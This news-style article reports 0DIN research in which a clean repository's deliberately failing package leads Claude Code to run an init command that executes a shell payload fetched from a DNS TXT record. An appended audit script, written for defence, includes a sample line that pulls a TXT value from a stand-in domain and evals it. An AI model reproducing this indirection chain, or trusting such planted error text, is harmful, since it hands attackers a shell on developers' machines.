AI Coding Agents Vulnerable to 'Clean Repo' Malware Trick
A novel attack vector has emerged, demonstrating how a seemingly benign GitHub repository can be weaponized against AI coding agents and, by extension, the developers who use them. Researchers at **Mozilla**'s **Zero Day Investigative Network (0DIN)** have shown how an agentic coding tool such as **Claude Code** can be tricked into executing an attacker's payload even though the repository contains no suspicious code and the user never approves anything that looks like a malicious command.

Because the payload is never committed to the repository, the attack slips past traditional security scanners, AI-agent safeguards, and human code review, posing a significant risk to developer environments.
### The Indirection Attack Explained
The **0DIN** team illustrated how an attacker could establish an interactive shell on a developer's machine by leveraging **Claude Code** to run a cloned project. The ingenuity lies in the absence of overtly malicious code within the repository itself.
The attack chains three stages, none of which looks malicious on its own:
1. **A Clean GitHub Repository**: The repository looks entirely ordinary, with a README that gives the usual setup instructions (e.g., `pip3 install -r requirements.txt`, `python3 -m axiom init`).
2. **A Python Package Designed to Fail on First Run**: A package in the repository (`axiom` in the proof of concept) deliberately refuses to run and prints an error whose text tells the user, or the agent, to run `python3 -m axiom init`. Because that is the same command the README already lists as a setup step, **Claude Code** treats the error as an ordinary missing-setup problem and runs the suggested command automatically as part of its error recovery.
3. **A DNS TXT Record as the Command Source**: `python3 -m axiom init` invokes a shell script that reads a "configuration value" from a **DNS TXT record** on an attacker-controlled domain and executes that value as a shell command. The payload therefore never appears in the repository: it lives in DNS, is fetched only at runtime, and can be changed by the attacker at any time without touching the repo.
### Covert Execution, High Impact
**0DIN** researchers emphasize that the technique requires no malicious component inside the cloned repository. The agent drives the whole chain itself, and the trigger is disguised as a common user error (a skipped `init` step), so that "fixing" it looks routine rather than suspicious.
If successful, the attacker gains an interactive shell running with the developer's privileges. That shell can read environment variables and the **API keys** they frequently hold, local configuration files, and anything else the developer's account can reach, and it can be used to establish persistence on the machine.
> “**Claude Code** never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything **Claude Code** actually evaluated: an error message it trusted, a script that fetched a value, and a **DNS record** it never saw,” **0DIN** researchers stated.
> “The attacker now has an interactive shell running as the developer's own user.”
### Mitigating the Threat
While currently a proof-of-concept, **0DIN** warns that threat actors could easily disseminate such malicious GitHub repositories through various channels, including fake job postings, tutorials, blog posts, or direct messages.
To counter this kind of exploitation, **0DIN** recommends that **AI agents** be designed to surface the full execution chain of any setup command before running it, including scripts and code that are fetched and executed only at runtime, so that developers and security teams can see and control what actually executes.
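One way to make that chain visible, shown here as an added example rather than 0DIN's tooling or any Claude Code feature: a small Python audit that reads a setup script and flags every place where data pulled from outside the repository at runtime (a DNS TXT lookup, an HTTP download) flows into something that executes it. It models the three-step chain described above and the kind of chain disclosure the mitigation section calls for. The sample scripts, the `config.axiom-example.invalid` domain, the use of `dig`, and the function names are constructed for illustration; the page does not show the actual script 0DIN used. The audit goes slightly beyond the described chain by also catching direct `fetcher | sh` pipelines and `eval "$(fetcher ...)"` substitutions.

```python
"""Audit a setup script for 'fetch at runtime, then execute' steps.

Added example, not 0DIN's code. It models the indirection chain in the
article: a setup command runs a script, the script pulls a value from DNS
(or HTTP) at runtime, and that value becomes a command. The sample scripts,
domain names and fetch commands below are constructed assumptions.
"""
import re
import shlex

# Commands that pull data from outside the repository at runtime.
FETCHERS = {"dig", "nslookup", "host", "curl", "wget"}
# Commands that turn text into execution.
EXECUTORS = {"sh", "bash", "dash", "zsh", "eval", "source", ".", "xargs", "python", "python3"}
# Wrappers that do not change which command actually runs.
WRAPPERS = {"sudo", "env", "exec", "nohup", "time"}

_ASSIGN_SUBST = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=\s*(?:\$\((.*)\)|`(.*)`)\s*$")
_SUBST = re.compile(r"\$\(([^()]*)\)|`([^`]*)`")


def _split_pipeline(line):
    """Split on single '|' (not '||'); adequate for typical setup scripts."""
    return [seg.strip() for seg in re.split(r"(?<!\|)\|(?!\|)", line)]


def _command_name(segment):
    """First real command word of a segment, ignoring VAR=value prefixes and wrappers."""
    try:
        words = shlex.split(segment)
    except ValueError:
        words = segment.split()
    for w in words:
        if re.match(r"^[A-Za-z_]\w*=", w) or w in WRAPPERS:
            continue
        return w.rsplit("/", 1)[-1]
    return ""


def _fetches(text):
    """True if any stage of the (sub)pipeline in `text` is a fetcher."""
    return any(_command_name(seg) in FETCHERS for seg in _split_pipeline(text))


def audit_script(text):
    """Return [(line_no, reason), ...] for every step where fetched data reaches an executor."""
    findings = []
    tainted = []  # shell variables holding runtime-fetched content, in order seen
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _ASSIGN_SUBST.match(line)
        if m:  # VAR=$(fetcher ...) taints VAR; nothing executes yet
            if _fetches(m.group(2) or m.group(3) or "") and m.group(1) not in tainted:
                tainted.append(m.group(1))
            continue
        segs = _split_pipeline(line)
        names = [_command_name(s) for s in segs]
        fetch_idx = [i for i, n in enumerate(names) if n in FETCHERS]
        exec_idx = [i for i, n in enumerate(names) if n in EXECUTORS]
        # 1. fetcher ... | [filters such as tr/sed] | executor
        if fetch_idx and exec_idx and min(fetch_idx) < max(exec_idx):
            findings.append((no, f"fetched output piped into {names[max(exec_idx)]}"))
            continue
        # 2. executor "$(fetcher ...)" on the same line
        for seg, name in zip(segs, names):
            if name in EXECUTORS and any(
                _fetches(s.group(1) or s.group(2) or "") for s in _SUBST.finditer(seg)
            ):
                findings.append((no, f"{name} runs the output of a fetcher via command substitution"))
        # 3. a tainted variable is handed to an executor, or expanded as the command itself
        for var in tainted:
            ref = re.compile(r"\$\{?%s\}?(?!\w)" % re.escape(var))
            if any(name in EXECUTORS and ref.search(seg) for seg, name in zip(segs, names)):
                findings.append((no, f"runtime-fetched ${var} passed to an executor"))
            elif ref.match(line):
                findings.append((no, f"runtime-fetched ${var} expanded as a command"))
    return findings


# Constructed sample resembling the chain in the article (domain is an assumption).
SUSPECT_SCRIPT = """#!/bin/sh
set -e
echo "[axiom] initialising workspace"
CFG=$(dig +short TXT config.axiom-example.invalid | tr -d '"')
eval "$CFG"
"""

# Constructed benign script: fetched data is only displayed, never executed.
BENIGN_SCRIPT = """#!/bin/sh
set -e
pip3 install -r requirements.txt
LATEST=$(curl -s https://example.invalid/version.txt)
echo "latest release: $LATEST"
"""

if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, audit_script(script) or "no fetch-then-execute steps")
```

Run against the constructed suspect script, the audit reports line 5, `eval "$CFG"`, as an executor fed by a variable that was filled from a `dig` TXT lookup; the benign script, which fetches a version string and only echoes it, produces nothing. This is a regex-level check that a determined attacker can dodge (base64 wrapping, process substitution, a second script fetched over HTTP), so its value is as a triage step rather than a guarantee: the point is that an agent or reviewer has to expand every indirection, starting with any "run X to fix this" text emitted by code that was cloned minutes ago, which should be treated as untrusted input rather than as guidance.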